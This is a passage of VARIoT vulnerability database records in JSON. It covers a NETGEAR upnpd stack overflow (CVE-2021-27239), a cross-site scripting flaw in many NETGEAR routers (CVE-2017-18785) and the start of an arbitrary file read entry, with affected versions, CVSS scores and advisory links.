"author": "CNNVD",
"id": "CNNVD-202103-1618",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-27239",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "VULMON",
"id": "CVE-2021-27239"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
}
]
},
"description": {
"_id": null,
"data": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851. NETGEAR R6400 and R6700 A stack-based buffer overflow vulnerability exists in the firmware. Zero Day Initiative To this vulnerability ZDI-CAN-11851 Was numbered.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-27239"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "VULMON",
"id": "CVE-2021-27239"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-27239",
"trust": 3.2
},
{
"db": "ZDI",
"id": "ZDI-21-206",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-11851",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-27239",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "VULMON",
"id": "CVE-2021-27239"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
}
]
},
"id": "VAR-202103-0938",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.3599811042857142
},
"last_update_date": "2024-11-23T22:37:03.359000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Stack-based\u00a0Buffer\u00a0Overflow\u00a0Remote\u00a0Code\u00a0Execution\u00a0Vulnerability\u00a0on\u00a0Some\u00a0Routers,\u00a0PSV-2020-0432",
"trust": 1.5,
"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
},
{
"title": "Netgear NETGEAR R6400 and NETGEAR R6700 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146570"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/WizardsOfTheInternet/CVE-2021-27239 "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "VULMON",
"id": "CVE-2021-27239"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://www.zerodayinitiative.com/advisories/zdi-21-206/"
},
{
"trust": 2.4,
"url": "https://kb.netgear.com/000062820/security-advisory-for-stack-based-buffer-overflow-remote-code-execution-vulnerability-on-some-routers-psv-2020-0432"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27239"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.1,
"url": "https://github.com/wizardsoftheinternet/cve-2021-27239"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "VULMON",
"id": "CVE-2021-27239"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "ZDI",
"id": "ZDI-21-206",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-27239",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1618",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-27239",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-02-24T00:00:00",
"db": "ZDI",
"id": "ZDI-21-206",
"ident": null
},
{
"date": "2021-03-29T00:00:00",
"db": "VULMON",
"id": "CVE-2021-27239",
"ident": null
},
{
"date": "2021-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-005006",
"ident": null
},
{
"date": "2021-03-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1618",
"ident": null
},
{
"date": "2021-03-29T21:15:12.377000",
"db": "NVD",
"id": "CVE-2021-27239",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-02-24T00:00:00",
"db": "ZDI",
"id": "ZDI-21-206",
"ident": null
},
{
"date": "2021-04-02T00:00:00",
"db": "VULMON",
"id": "CVE-2021-27239",
"ident": null
},
{
"date": "2021-12-06T05:23:00",
"db": "JVNDB",
"id": "JVNDB-2021-005006",
"ident": null
},
{
"date": "2021-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1618",
"ident": null
},
{
"date": "2024-11-21T05:57:39.813000",
"db": "NVD",
"id": "CVE-2021-27239",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "NETGEAR\u00a0R6400\u00a0 and \u00a0R6700\u00a0 Stack-based buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1618"
}
],
"trust": 0.6
}
}
var-202004-1428
Vulnerability from variot
plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1428",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.18"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.26"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "ex2700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "jwnr2010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "ex6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.12"
},
{
"model": "wn2000rpt",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "ex7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.26"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.50"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.24"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.1.00.24"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.35"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d3600_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
}
]
},
"cve": "CVE-2017-18785",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2017-18785",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014878",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.7,
"id": "CVE-2017-18785",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.1,
"id": "CVE-2017-18785",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2017-014878",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18785",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18785",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014878",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1888",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with.",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
}
],
"trust": 0.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18785",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014878",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"id": "VAR-202004-1428",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4028575456097561
},
"last_update_date": "2024-11-23T23:04:25.068000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Cross-Site Scripting on Some Routers, Gateways, and Extenders, PSV-2017-2950",
"trust": 0.8,
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
},
{
"title": "Multiple NETGEAR Fixes for product cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116664"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049534/security-advisory-for-cross-site-scripting-on-some-routers-gateways-and-extenders-psv-2017-2950"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18785"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18785"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"date": "2020-04-22T15:15:12.957000",
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014878"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1888"
},
{
"date": "2024-11-21T03:20:54.943000",
"db": "NVD",
"id": "CVE-2017-18785"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014878"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1888"
}
],
"trust": 0.6
}
}
var-202004-1356
Vulnerability from variot
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR R8500, etc. are all products of NETGEAR. NETGEAR R8500 is a wireless router. NETGEAR R6300 is a wireless router. NETGEAR EX3700 is a wireless WiFi signal range extender.
There are security vulnerabilities in many NETGEAR products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
